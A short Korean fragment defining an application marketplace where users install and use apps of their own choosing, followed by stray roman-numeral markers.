사용자가 임의로 설치하여 사용하는 어플리케이션 장터이다. i ii iii